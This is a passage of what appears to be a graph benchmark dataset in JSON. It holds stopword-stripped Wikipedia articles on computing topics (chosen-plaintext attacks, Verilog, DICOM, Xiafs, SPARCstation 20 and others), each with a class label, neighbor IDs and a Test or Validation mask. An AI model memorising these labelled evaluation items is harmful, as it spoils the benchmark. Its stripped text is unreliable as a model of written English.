intercepted message immediately reported superiors af low water confirming navy hypothesis allowing position force win battle also world war ii allied codebreakers bletchley park would sometimes ask royal air force lay mines position n't abbreviations alternatives german naval system grid reference hope germans seeing mines would use enigma machine encrypt warning message mines clear message removed giving allies enough information message break german naval enigma process planting known-plaintext called gardening allied codebreakers also helped craft messages sent double agent juan pujol garcía whose encrypted radio reports received madrid manually decrypted re-encrypted enigma machine transmission berlin helped codebreakers decrypt code used second leg supplied original text modern day chosen-plaintext attacks cpas often used break symmetric ciphers considered cpa-secure symmetric cipher must vulnerable chosen-plaintext attacks thus important symmetric cipher implementors understand attacker would attempt break cipher make relevant improvements chosen-plaintext attacks small part plaintext may need chosen attacker attacks known plaintext injection attacks chosen-plaintext attack powerful known-plaintext attack attacker directly target specific terms patterns without wait appear naturally allowing faster gathering data relevant cryptanalysis therefore cipher prevents chosen-plaintext attacks also secure known-plaintext ciphertext-only attacks however chosen-plaintext attack less powerful chosen-ciphertext attack attacker obtain plaintexts arbitrary ciphertexts cca-attacker sometimes break cpa-secure system example el gamal cipher secure chosen plaintext attacks vulnerable chosen ciphertext attacks unconditionally malleable",
    "neighbors": [
      9058,
      9156,
      1797,
      11241,
      618,
      3084,
      2957,
      177,
      4497,
      5107,
      11185,
      1941,
      7161,
      3707,
      8286,
      895
    ],
    "mask": "Test"
  },
  {
    "node_id": 11120,
    "label": 8,
    "text": "Scuttle_(software):scuttle software scuttle php/mysql-based open source social bookmarking application contains code php-based projects drupal jquery scuttle offers functionality social bookmarking websites tagging rss multiple languages security settings public private also supports bookmark imports delicious delicious api means programs widgets might also work backups available via xml mysql backend lacks administrator backend although one commercially available called scuttle plus advanced semantic scuttle provides anti-spam protection structured tags collaborative tag description",
    "neighbors": [
      546,
      8644,
      5612,
      7022,
      7983,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11121,
    "label": 2,
    "text": "WinLinux:winlinux winlinux linux distribution installer runs inside windows operating system also configuration tool run inside windows set hardware options linux os installed directory existing fat32 partition means ability share windows partition disk space latest version winlinux 2003 launched like windows application shortcut causes pc reboot winlinux exiting winlinux allow pc go back windows next bootup able run linux applications ships kde default desktop distribution currently inactive",
    "neighbors": [
      8837,
      7435,
      6797,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      5721,
      9693,
      2914,
      485,
      3685,
      9064,
      1513,
      4841,
      6890,
      7020,
      7913,
      7534,
      2671,
      7920,
      8177,
      9074,
      10860,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11122,
    "label": 4,
    "text": "Interest_Flooding_Attack:interest flooding attack interest flooding attack ifa denial-of-service attack information-centric network content-centric networking ccn named data networking ndn attacker requests existing non-existing content order overload distribution infrastructure implemented sending interest packets resolved resolved fast enough thus lead malicious cpu memory consumption attack previously denoted open problem icn heuristic countermeasures available 2016 aubrey alston tamer refaei mitre corporation presented exact solution problem utilizes in-packet cryptographic mechanism remove ability high-volume interest traffic overload distribution infrastructure network",
    "neighbors": [
      2409,
      5890
    ],
    "mask": "Test"
  },
  {
    "node_id": 11123,
    "label": 3,
    "text": "Exec_(Amiga):exec amiga exec kernel amigaos 13 kb multitasking microkernel enabled pre-emptive multitasking little 256 kb memory supplied first amiga 1000s exec provided functions multitasking memory management handling interrupts dynamic shared libraries acts scheduler tasks running system providing pre-emptive multitasking prioritized round-robin scheduling exec also provides access libraries high-level inter-process communication via message passing comparable microkernels performance problems need copy messages address spaces since amiga one address space exec message passing quite efficient fixed memory address amiga software address 4 pointer codice_1 used access libraries exec designed implemented carl sassenrath unlike newer modern operating systems exec kernel run privileged contemporary operating systems 68000 atari tos sunos used trap instructions invoke kernel functions made kernel functions run 68000 supervisor mode user software ran unprivileged user mode contrast exec function calls made library jump table kernel code normally executes user mode whenever supervisor mode needed either kernel user programs library functions codice_2 codice_3 used one limit exec kernel uncooperative program could disable multitasking long time indefinitely invoking exec calls codice_4 codice_5 later invocation corresponding codice_6 codice_7 causing environment run one task multitasking could also disabled programs software bug intent modify exec data structures code stored random-access memory ram possibly due lack memory management unit mmu support even limits exec satisfies definition preemptive scheduling algorithm using preemptive scheduling routine basing interrupt intervals clock linux kernel developer linus torvalds described amiga design cooperative even though uses preemptive scheduling policy reason argued lack memory protection tasks meant task could hinder system operating preemptively tasks would need choose stop preemptive mechanism would reduce kind inverted cooperative system kind conflation protection scheduler policy nonstandard execsg second generation kernel used amigaos 4 kernel licensed hyperion entertainment thomas frieden hans-jörg frieden exposes functions structures commodore amiga exec kernel runs powerpc cpus ultimate origin execsg unspecified",
    "neighbors": [
      7561,
      139,
      5264,
      2193,
      8976,
      7187,
      9236,
      3350,
      6300,
      3233,
      9249,
      5029,
      2345,
      8618,
      11180,
      6062,
      7983,
      432,
      8369,
      8115,
      5049,
      58,
      6075,
      10813,
      10176,
      10436,
      11076,
      2761,
      10570,
      9931,
      5709,
      1742,
      2383,
      6352,
      5457,
      850,
      4564,
      5976,
      6233,
      9176,
      5598,
      5729,
      7269,
      8551,
      5736,
      11370,
      5743,
      2290,
      5363,
      11123,
      9848,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11124,
    "label": 0,
    "text": "TERMIUM_Plus:termium plus termium plus electronic terminological database operated maintained translation bureau government canada database offers millions english french terms various specialized fields terms spanish portuguese also available multilingual database termium plus initially developed université de montréal october 1970 database initially named banque de terminologie de l ’ université de montréal btum direction marcel paré vision produce flexible bilingual language file would available btum initially funded private donors government subsidies grew help professionals field translation following years 1975 btum able obtain data user responses collaboration language services bell canada end 1974 however translation bureau canadian secretary state department showed interest operation btum goal translation bureau time standardize terminology throughout public service well federal public administration january 1976 canadian secretary state department officially acquired btum renamed database termium terminologie université de montréal system transferred central computer federal government ottawa began integrate approximately 175,000 files btum initially compiled files translation bureau working years follow bureau began sorting process along input process onto computer database grew 900,000 records 1987 terminological records grew termium database canadian government received proposal 1985 toronto-based company launch termium cd-rom format order make database accessible users fall 1987 pilot project cd-rom launched investigate responses users included services translation bureau private canadian companies data compilation investigation bureau incorporated indexing system improve speed accuracy term extraction 1990 termium cd-rom commercially available subscription annual fee 1,100 1,500 updates released every three four months 1996 termium cd-rom received award atio association translators interpreters ontario october 2009 termium plus array language tools language portal canada launched free online access termium initially developed contain terminological records canada ’ official languages english french system upgraded third-generation version 1985 contained records languages spanish order accommodate growing range users worth noting however “ multilingual ” records term source language would english french equivalent non-official language currently vast collection specialized domains fields covered termium plus ranging administration including appellations arts sciences law justice aside millions entries recorded termium plus database also contains writing tools english french language canadian style writing style guide dictionnaire des cooccurrences guide french collocations archived glossaries well link language portal canada containing various french english writing resources",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11125,
    "label": 9,
    "text": "Verilog:verilog verilog standardized ieee 1364 hardware description language hdl used model electronic systems commonly used design verification digital circuits register-transfer level abstraction also used verification analog circuits mixed-signal circuits well design genetic circuits 2009 verilog standard ieee 1364-2005 merged systemverilog standard creating ieee standard 1800-2009 since verilog officially part systemverilog language current version ieee standard 1800-2017 hardware description languages verilog similar software programming languages include ways describing propagation time signal strengths sensitivity two types assignment operators blocking assignment non-blocking assignment non-blocking assignment allows designers describe state-machine update without needing declare use temporary storage variables since concepts part verilog language semantics designers could quickly write descriptions large circuits relatively compact concise form time verilog introduction 1984 verilog represented tremendous productivity improvement circuit designers already using graphical schematic capture software specially written software programs document simulate electronic circuits designers verilog wanted language syntax similar c programming language already widely used engineering software development like c verilog case-sensitive basic preprocessor though less sophisticated ansi c/c++ control flow keywords if/else case etc equivalent operator precedence compatible c. syntactic differences include required bit-widths variable declarations demarcation procedural blocks verilog uses begin/end instead curly braces many minor differences verilog requires variables given definite size c sizes assumed 'type variable instance integer type may 8 bits verilog design consists hierarchy modules modules encapsulate design hierarchy communicate modules set declared input output bidirectional ports internally module contain combination following net/variable declarations wire reg integer etc concurrent sequential statement blocks instances modules sub-hierarchies sequential statements placed inside begin/end block executed sequential order within block however blocks executed concurrently making verilog dataflow language verilog concept 'wire consists signal values 4-state 1 0 floating undefined signal strengths strong weak etc. system allows abstract modeling shared signal lines multiple sources drive common net wire multiple drivers wire readable value resolved function source drivers strengths subset statements verilog language synthesizable verilog modules conform synthesizable coding style known rtl register-transfer level physically realized synthesis software synthesis software algorithmically transforms abstract verilog source netlist logically equivalent description consisting elementary logic primitives flip-flops etc available specific fpga vlsi technology manipulations netlist ultimately lead circuit fabrication blueprint photo mask set asic bitstream file fpga verilog one first popular hardware description languages invented created prabhu goel phil moorby chi-lai huang douglas warmke late 1983 early 1984 chi-lai huang earlier worked hardware description lalsd language developed professor s.y.h su phd work wording process automated integrated design systems later renamed gateway design automation 1985 hardware modeling language gateway design automation purchased cadence design systems 1990 cadence full proprietary rights gateway verilog verilog-xl hdl-simulator would become de facto standard verilog logic simulators next decade originally verilog intended describe allow simulation automated synthesis subsets language physically realizable structures gates etc developed language achieved widespread usage verilog portmanteau words verification logic increasing success vhdl time cadence decided make language available open standardization cadence transferred verilog public domain open verilog international ovi known accellera organization verilog later submitted ieee became ieee standard 1364-1995 commonly referred verilog-95 time frame cadence initiated creation verilog-a put standards support behind analog simulator spectre verilog-a never intended standalone language subset verilog-ams encompassed verilog-95 extensions verilog-95 submitted back ieee cover deficiencies users found original verilog standard extensions became ieee standard 1364-2001 known verilog-2001 verilog-2001 significant upgrade verilog-95 first adds explicit support 2 complement signed nets variables previously code authors perform signed operations using awkward bit-level manipulations example carry-out bit simple 8-bit addition required explicit description boolean algebra determine correct value function verilog-2001 succinctly described one built-in operators » generate/endgenerate construct similar vhdl generate/endgenerate allows verilog-2001 control instance statement instantiation normal decision operators case/if/else using generate/endgenerate verilog-2001 instantiate array instances control connectivity individual instances file i/o improved several new system tasks finally syntax additions introduced improve code readability e.g always named parameter override c-style function/task/module header declaration verilog-2001 version verilog supported majority commercial eda software packages confused systemverilog verilog 2005 ieee standard 1364-2005 consists minor corrections spec clarifications new language features uwire keyword separate part verilog standard verilog-ams attempts integrate analog mixed signal modeling traditional verilog advent hardware verification languages openvera verisity e language encouraged development superlog co-design automation inc acquired synopsys foundations superlog vera donated accellera later became ieee standard p1800-2005 systemverilog systemverilog superset verilog-2005 many new features capabilities aid design verification design modeling 2009 systemverilog verilog language standards merged systemverilog 2009 ieee standard 1800-2009 current version ieee standard 1800-2017 simple example two flip-flops follows operator verilog another aspect hardware description language opposed normal procedural language known non-blocking assignment action register always block executed means order assignments irrelevant produce result flop1 flop2 swap values every clock assignment operator referred blocking assignment assignment used purposes logic target variable updated immediately example statements used blocking operator instead flop1 flop2 would swapped instead traditional programming compiler would understand simply set flop1 equal flop2 subsequently ignore redundant logic set flop2 equal flop1 example counter circuit follows example delays always clause illustrates type method use i.e executes whenever entities list b e changes one changes immediately assigned new value due blocking assignment b assigned new value afterward taking account new value delay 5 time units c assigned value b value c e tucked away invisible store 6 time units assigned value tucked away signals driven within process initial always block must type reg signals driven outside process must type wire keyword reg necessarily imply hardware register definition constants verilog supports addition width parameter basic syntax width bits base letter number examples several statements verilog analog real hardware e.g display consequently much language used describe hardware examples presented classic subset language direct mapping real gates next interesting structure transparent latch pass input output gate signal set pass-through captures input stores upon transition gate signal hold output remain stable regardless input signal gate set hold example pass-through level gate would value clause true i.e gate 1 read gate true din fed latch_out continuously clause false last value latch_out remain independent value din flip-flop next significant template verilog d-flop simplest modeled significant thing notice example use non-blocking assignment basic rule thumb use posedge negedge statement within always clause variant d-flop one asynchronous reset convention reset state first clause within statement next variant including asynchronous reset asynchronous set condition convention comes play i.e reset term followed set term note model used model set/reset flip flop simulation errors result consider following test sequence events 1 reset goes high 2 clk goes high 3 set goes high 4 clk goes high 5 reset goes low followed 6 set going low assume setup hold violations example always statement would first execute rising edge reset occurs would place q value 0 next time always block executes would rising edge clk would keep q value 0 always block executes set goes high reset high forces q remain 0 condition may may correct depending actual flip flop however main problem model notice reset goes low set still high real flip flop cause output go 1 however model occur always block triggered rising edges set reset — levels different approach may necessary set/reset flip flops final basic variant one implements d-flop mux feeding input mux d-input feedback flop allows gated load function note initial blocks mentioned description split fpga asic synthesis tools structure fpga tools allow initial blocks reg values established instead using reset signal asic synthesis tools n't support statement reason fpga initial state something downloaded memory tables fpga asic actual hardware implementation two separate ways declaring verilog process always initial keywords always keyword indicates free-running process initial keyword indicates process executes exactly constructs begin execution simulator time 0 execute end block always block reached end rescheduled common misconception believe initial block execute always block fact better think initial-block special-case always-block one terminates completes first time classic uses two keywords two significant additional uses common always keyword without ... sensitivity list possible use always shown always keyword acts similar c language construct 1 .. sense execute forever interesting exception use initial keyword addition forever keyword example functionally identical always example fork/join pair used verilog create parallel processes statements blocks fork/join pair begin execution simultaneously upon execution flow hitting fork execution continues join upon completion longest running statement block fork join way written possible either sequences abc bac print order simulation first write second write depends simulator implementation may purposefully randomized simulator allows simulation contain accidental race conditions well intentional non-deterministic behavior notice vhdl dynamically spawn multiple processes like verilog order execution n't always guaranteed within verilog best illustrated classic example consider code snippet printed values b depending order execution initial blocks could zero zero alternately zero arbitrary uninitialized value display statement always execute assignment blocks completed due 1 delay note operators shown order precedence ieee 1364 standard defines four-valued logic four states 0 1 z high impedance x unknown logic value competing vhdl dedicated standard multi-valued logic exists ieee 1164 nine levels system tasks available handle simple i/o various design measurement functions simulation system tasks prefixed distinguish user tasks functions section presents short list frequently used tasks means comprehensive list pli provides programmer mechanism transfer control verilog program function written c language officially deprecated ieee std 1364-2005 favor newer verilog procedural interface completely replaces pli pli vpi enables verilog cooperate programs written c language test harnesses instruction set simulators microcontroller debuggers example provides c functions codice_1 codice_2 used write read argument current verilog task function respectively information verilog simulators see list verilog simulators",
    "neighbors": [
      9345,
      7170,
      8450,
      8708,
      7045,
      9090,
      5768,
      5896,
      7049,
      7819,
      398,
      2450,
      659,
      5270,
      5786,
      1051,
      9371,
      8863,
      4773,
      10789,
      5671,
      682,
      6187,
      4396,
      1917,
      3886,
      7471,
      2224,
      6904,
      434,
      3762,
      692,
      11321,
      6716,
      8508,
      2623,
      5439,
      3010,
      3780,
      11333,
      8262,
      9926,
      8788,
      9685,
      3159,
      4569,
      10332,
      6239,
      11487,
      4581,
      5861,
      5862,
      5863,
      6633,
      10474,
      5355,
      9964,
      4465,
      8822,
      1399,
      3960,
      8828,
      2045,
      3838,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 11126,
    "label": 5,
    "text": "DICOM:dicom digital imaging communications medicine dicom standard communication management medical imaging information related data dicom commonly used storing transmitting medical images enabling integration medical imaging devices scanners servers workstations printers network hardware picture archiving communication systems pacs multiple manufacturers widely adopted hospitals making inroads smaller applications like dentists doctors offices dicom files exchanged two entities capable receiving image patient data dicom format different devices come dicom conformance statements clearly state dicom classes support standard includes file format definition network communications protocol uses tcp/ip communicate systems national electrical manufacturers association nema holds copyright published standard developed dicom standards committee whose members also partly members nema also known nema standard ps3 iso standard 12052:2017 health informatics -- digital imaging communication medicine dicom including workflow data management dicom used worldwide store exchange transmit medical images dicom central development modern radiological imaging dicom incorporates standards imaging modalities radiography ultrasonography computed tomography ct magnetic resonance imaging mri radiation therapy dicom includes protocols image exchange e.g. via portable media dvds image compression 3-d visualization image presentation results reporting dicom standard divided related independent parts dicom standard developed american college radiology acr national electrical manufacturers association nema beginning 1980s difficult anyone manufacturers computed tomography magnetic resonance imaging devices decode images machines generated radiologists medical physicists wanted use images dose-planning radiation therapy acr nema joined forces formed standard committee 1983 first standard acr/nema 300 entitled digital imaging communications released 1985 soon release became clear improvements needed text vague internal contradictions 1988 second version released version gained acceptance among vendors image transmission specified dedicated 2 pair cable eia-485 first demonstration acr/nema v2.0 interconnectivity technology held georgetown university may 21–23 1990 six companies participated event dejarnette research systems general electric medical systems merge technologies siemens medical systems vortech acquired kodak year 3m commercial equipment supporting acr/nema 2.0 presented annual meeting radiological society north america rsna 1990 vendors many soon realized second version also needed improvement several extensions acr/nema 2.0 created like papyrus developed university hospital geneva switzerland spi standard product interconnect driven siemens medical systems philips medical systems first large-scale deployment acr/nema technology made 1992 us army air force part mdis medical diagnostic imaging support program based ft. detrick maryland loral aerospace siemens medical systems led consortium companies deploying first us military pacs picture archiving communications system major army air force medical treatment facilities teleradiology nodes large number us military clinics dejarnette research systems merge technologies provided modality gateway interfaces third party imaging modalities siemens spi network veterans administration navy also purchased systems contract 1993 third version standard released name changed digital imaging communications medicine abbreviated dicom new service classes defined network support added conformance statement introduced initially dicom standard referred dicom 3.0 distinguish predecessors dicom constantly updated extended since 1993 intent changes backward compatible except rare cases earlier specification incorrect ambiguous officially version standard except current standard hence 3.0 version number longer used minor versions standard e.g. thing dicom 3.1 current plans develop new incompatible version standard i.e. dicom 4.0 standard referenced without specification date release particular published edition except specific conformance requirements invoked depend retired feature longer documented current standard dicom standard achieved near universal level acceptance amongst medical imaging equipment vendors healthcare organizations standard limitations dicom standard directed addressing technical interoperability issues medical imaging framework architecture achieving useful clinical workflow integrating healthcare enterprise ihe initiative layered top dicom hl-7 defines profiles select features standards implement transactions specific medical imaging interoperability use cases though always internet compatible based transport tcp time increasing need support port 80 http transport make use easier within web browser recently family dicom restful web services defined allow mobile device friendly access dicom objects services include wado-rs stow-rs qido-rs together constitute dicomweb initiative derivations dicom standard application areas include diconde digital imaging communication nondestructive evaluation established 2004 way nondestructive testing manufacturers users share image data dicos digital imaging communication security established 2009 used image sharing airport security dicom groups information data sets example file chest x-ray image may contain patient id within file image never separated information mistake similar way image formats jpeg also embedded tags identify otherwise describe image dicom data object consists number attributes including items name id etc. also one special attribute containing image pixel data i.e logically main object header merely list attributes including pixel data single dicom object one attribute containing pixel data many modalities corresponds single image however attribute may contain multiple frames allowing storage cine loops multi-frame data another example nm data nm image definition multi-dimensional multi-frame image cases three- four-dimensional data encapsulated single dicom object pixel data compressed using variety standards including jpeg lossless jpeg jpeg 2000 run-length encoding rle lzw zip compression used whole data set pixel data rarely implemented dicom uses three different data element encoding schemes explicit value representation vr data elements vrs ob ow sq ut un format data element group 2 bytes element 2 bytes vr 2 bytes lengthinbyte 2 bytes data variable length explicit data elements implicit data elements see section 7.1 part 5 dicom standard basic format used applications including network file usage written file usually true header containing copies key attributes details application wrote added promote identical grayscale image display different monitors consistent hard-copy images various printers dicom committee developed lookup table display digitally assigned pixel values use dicom grayscale standard display function gsdf images must viewed printed devices lookup curve devices calibrated gsdf curve addition value representation attribute also value multiplicity indicate number data elements contained attribute character string value representations one data element encoded successive data elements separated backslash character dicom consists services involve transmission data network file format offline media later addition standard dicom store service used send images persistent objects structured reports etc picture archiving communication system pacs workstation dicom storage commitment service used confirm image permanently stored device either redundant disks backup media e.g burnt cd service class user scu similar client modality workstation etc. uses confirmation service class provider scp similar server archive station instance make sure safe delete images locally enables workstation find lists images objects retrieve picture archiving communication system dicom modality worklist service provides list imaging procedures scheduled performance image acquisition device sometimes referred modality system items worklist include relevant details subject procedure patient id name sex age type procedure equipment type procedure description procedure code procedure order referring physician accession number reason exam image acquisition device ct scanner queries service provider ris get information presented system operator used imaging device populate details image metadata prior use dicom modality worklist service scanner operator required manually enter relevant details manual entry slower introduces risk misspelled patient names data entry errors complementary service modality worklist enables modality send report performed examination including data images acquired beginning time end time duration study dose delivered etc helps give radiology department precise handle resource acquisition station use also known mpps service allows modality better coordinate image storage servers giving server list objects send actually sending objects dicom print service used send images dicom printer normally print x-ray film standard calibration defined dicom part 14 help ensure consistency various display devices including hard copy printout format off-line media files specified part 10 dicom standard files sometimes referred part 10 files dicom restricts filenames dicom media 8 characters systems wrongly use 8.3 conform standard information must extracted names ps3.10 section 6.2.3.2 common source problems media created developers read specifications carefully historical requirement maintain compatibility older existing systems also mandates presence media directory dicomdir file provides index summary information dicom files media dicomdir information provides substantially greater information file filename could less need meaningful file names dicom files typically .dcm file extension part dicom media requires without extension mime type dicom files defined rfc 3240 application/dicom uniform type identifier type dicom files org.nema.dicom also ongoing media exchange test connectathon process cd media network operation organized ihe organization core application dicom standard capture store distribute medical images standard also provides services related imaging managing imaging procedure worklists printing images film digital media like dvds reporting procedure status like completion imaging acquisition confirming successful archiving images encrypting datasets removing patient identifying information datasets organizing layouts images review saving image manipulations annotations calibrating image displays encoding ecgs encoding cad results encoding structured measurement data storing acquisition protocols dicom information object definitions encode data produced wide variety imaging device types including ct computed tomography mri magnetic resonance imaging ultrasound x-ray fluoroscopy angiography mammography breast tomosynthesis pet positron emission tomography spect single photon emission computed tomography endoscopy microscopy whole slide imaging oct optical coherence tomography dicom also implemented devices associated images imaging workflow including pacs picture archiving communication systems image viewers display stations cad computer-aided detection/diagnosis systems 3d visualization systems clinical analysis applications image printers film scanners media burners export dicom files onto cds dvds etc media importers import dicom files cds dvds usbs etc ris radiology information systems vna vendor-neutral archives emr electronic medical record systems radiology reporting systems many fields medicine dedicated working group within dicom dicom applicable field medicine imaging prevalent including radiology cardiology oncology nuclear medicine radiotherapy neurology orthopedics obstetrics gynecology ophthalmology dentistry maxillofacial surgery dermatology pathology clinical trials veterinary medicine medical/clinical photography dicom reserved following tcp udp port numbers internet assigned numbers authority iana 104 well-known port dicom transmission control protocol tcp user datagram protocol udp since 104 reserved subset many operating systems require special privileges use 2761 registered port dicom using integrated secure communication layer iscl tcp udp 2762 registered port dicom using transport layer security tls tcp udp 11112 registered port dicom using standard open communication tcp udp standard recommends require use port numbers according paper presented international symposium 2008 dicom standard problems related data entry major disadvantage dicom standard possibility entering probably many optional fields disadvantage mostly showing inconsistency filling fields data image objects often incomplete fields left blank filled incorrect data hand file format admits executable code maybe exists possibility contains malware dvtk open source project testing validating diagnosing communication protocols scenarios medical environments supports dicom hl7 ihe integration profiles health level 7 non-profit organization involved development international healthcare informatics interoperability standards hl7 dicom manage joint working group harmonize areas two standards overlap address imaging integration electronic medical record integrating healthcare enterprise ihe industry sponsored non-profit organization profiles use standards address specific healthcare use cases dicom incorporated variety imaging related ihe profiles systematized nomenclature medicine snomed systematic computer-processable collection medical terms human veterinary medicine provide codes terms synonyms definitions cover anatomy diseases findings procedures microorganisms substances etc dicom data makes use snomed encode relevant concepts xnview supports codice_1 codice_2 mime type codice_3",
    "neighbors": [
      8134,
      10022,
      296,
      10924,
      6797,
      2222,
      2990,
      6993,
      884,
      11413,
      11385,
      6650,
      7515,
      4797,
      7422
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11127,
    "label": 6,
    "text": "Macfusion:macfusion macfusion open-source network file-system client based fuse curlftpfs sshfs 64-bit macintosh computers using 64-bit os macfusion needs instead old unmaintained macfuse one newer implementations fuse like osxfuse fuse4x",
    "neighbors": [
      7364,
      7983,
      6935
    ],
    "mask": "Test"
  },
  {
    "node_id": 11128,
    "label": 6,
    "text": "Xiafs:xiafs xiafs file system linux kernel conceived developed frank xia based minix file system today obsolete use except possibly historic installations linux originally used minix file system number limitations example length filenames limited 14 characters partition size limited 64 mb replace minix file system extended file system ext developed however ext retained problems poor performance lack date stamps two contenders replacing ext quickly developed ext2 xiafs two file systems included standard kernel december 1993 linux 0.99.15 ext2 xiafs goal offer good performance reasonable limitations fixing flaws ext initially xiafs stable ext2 fairly minimalistic modification minix file system well suited future extension end result xiafs changed little ext2 evolved considerably rapidly improving stability performance adding extensions ext2 shakedown time quickly became standard file system linux since ext2 developed mature robust file system xiafs original ext removed linux version 2.1.21 longer use maintained ext2 ext3 successor ext4 linux kernel exercise computer history file system tutorial xiafs ported modern linux 2013 xiafs less powerful offered less functionality ext2 maximum size file 64 mib maximum size partition 2 gib improvement ext measure ext2 xiafs used less disk space control structures greater stability time",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11129,
    "label": 3,
    "text": "SPARCstation_20:sparcstation 20 sparcstation 20 a.k.a ss20 codename kodiak discontinued sun microsystems workstation based supersparc hypersparc cpu last model sparcstation family sun pizza box computers superseded ultrasparc design 1995 sparcstation 20 dual 50 mhz mbus ports allow use faster cpus sparcstation 10 two dual-cpu modules updated firmware sparcstation 20 supports maximum 4 cpus fastest cpu produced sparcstation 20 200 mhz ross hypersparc prom sparcstation 20 determines cpu compatibility version 2.25r last prom release sparcstation 20 sparcstation 20 8 200-pin dsimm slots supports maximum 512 mb memory 64 mb modules memory modules sparcstation 20 compatible sparcstation 10 sun ultra 1 computers sun4m sun4u families physically incompatible simm slots found pc computers 2 8 simm slots wider others used non-memory peripherals like caching nvsimm video vsimm cards sparcstation 20 two internal sca bays external scsi connector two bays cd-rom floppy drives earlier revisions sparcstation20 case contain cd-rom floppy bays slightly shorter standard 3.5 bay regular devices intended pc compatible computers usually fit later revisions sparcstation20 sparcstation5 narrower slot floppy drive more-standard cd-rom fit scsi host controller integrated motherboard sparcstation 20 support ide devices limitation releases openboot prom sparcstation 20 prevents booting point disk past 2 gigabyte mark sparcstation 20 one integrated amd lance 10baset ethernet interface additional ethernet interfaces added sbus card sparcstation 20 built 13w3 video socket driven optional sx cg14 framebuffer built onto vsimm vsimm available 4mb 8mb capacity capable 1280x1024 8mb 1152x900 4mb 24-bit color two vsimms installed auxiliary video board must also installed provide second 13w3 video socket alternatively sbus cards used including zx leo turbo gx cg6 others sparcstation 20 integrated sound 4 standard 3.5 mm audio jacks headphones microphone line line sparcstation 20 uses battery-backed nvram module hold data system host id serial number mac address battery chip dies nvram module must replaced modified use external battery nvram must reprogrammed mac address host id optionally m48t08-100pc1 used sunos 4.1.3_u1b onwards solaris 2.3 9 linux debian gentoo suse 7.0 7.3 probably others miros bsd netbsd openbsd run sparcstation 20 certain cpu modules sun supersparc nextstep 3.3 openstep 4.x also run",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1818,
      11426,
      1316,
      10789,
      7594,
      1707,
      3247,
      6322,
      6333,
      7104,
      9665,
      6338,
      10436,
      8007,
      1480,
      4172,
      2895,
      597,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      5233,
      6129,
      7411,
      8179,
      9333,
      1399,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11130,
    "label": 3,
    "text": "Graphics_Core_Next:graphics core next graphics core next gcn codename series microarchitectures well instruction set gcn developed amd gpus successor terascale microarchitecture/instruction set first product featuring gcn launched january 9 2012 gcn risc simd rather simt microarchitecture contrasting vliw simd architecture terascale gcn requires considerably transistors terascale offers advantages gpgpu computation makes compiler simpler also lead better utilization gcn graphics chips fabricated cmos 28 nm finfet 14 nm samsung electronics globalfoundries 7 nm tsmc available selected models radeon hd 7000 hd 8000 200 300 400 500 vega series amd radeon graphics cards including separately released radeon vii gcn also used graphics portion amd accelerated processing units apu playstation 4 xbox one apus gcn instruction set owned amd also owns x86-64 instruction set gcn instruction set developed specifically gpus gpgpu example micro-operation division documentation available llvm code generator compiler back-end available gcn instruction set used mesa 3d miaow open-source rtl implementation amd southern islands gpgpu instruction set aka graphics core next november 2015 amd announced boltzmann initiative amd boltzmann initiative shall enable porting cuda-based applications common c++ programming model super computing 15 amd showed heterogeneous compute compiler hcc headless linux driver hsa runtime infrastructure cluster-class high performance computing hpc heterogeneous-compute interface portability hip tool porting cuda-based applications common c++ programming model july 2017 family microarchitectures implementing identically called instruction set graphics core next seen five iterations differences instruction set rather minimal differentiate much one another exception fifth generation gcn architecture heavily modified stream processors improve performance support simultaneous processing two lower precision numbers place single higher precision number graphics command processor gcp functional unit gcn microarchitecture among tasks responsible asynchronous shaders short video amd asynchronous shaders visualizes differences multi thread preemption asynchronous shaders asynchronous compute engine ace distinct functional block serving computing purposes purpose similar graphics command processor since third iteration gcn hardware contains two schedulers one schedule wavefronts shader execution cu scheduler see new one schedule execution draw compute queues latter helps performance executing compute operations cus underutilized graphics commands limited fixed function pipeline speed bandwidth limited functionality known async compute given shader gpu drivers also need select good instruction order order minimize latency done cpu sometimes referred scheduling geometry processor contains geometry assembler tesselator vertex assembler gcn tesselator geometry processor capable tessellation hardware defined direct3d 11 opengl 4.5 see amd january 21 2017 gcn tesselator amd current sip block earlier units ati truform hardware tessellation terascale one compute unit combines 64 shader processors 4 tmus compute unit separate feed render output units rops compute unit consists cu scheduler branch message unit 4 simd vector units 16-lane wide 4 64kib vgpr files 1 scalar unit 4 kib gpr file local data share 64 kib 4 texture filter units 16 texture fetch load/store units 16 kib l1 cache four compute units wired share instruction cache 16 kib size scalar data cache 32kib size backed l2 cache simd-vu operates 16 elements time per cycle su operate one time one/cycle addition su handles operations like branching every simd-vu private memory stores registers two types registers scalar registers s0 s1 etc hold 4 bytes number 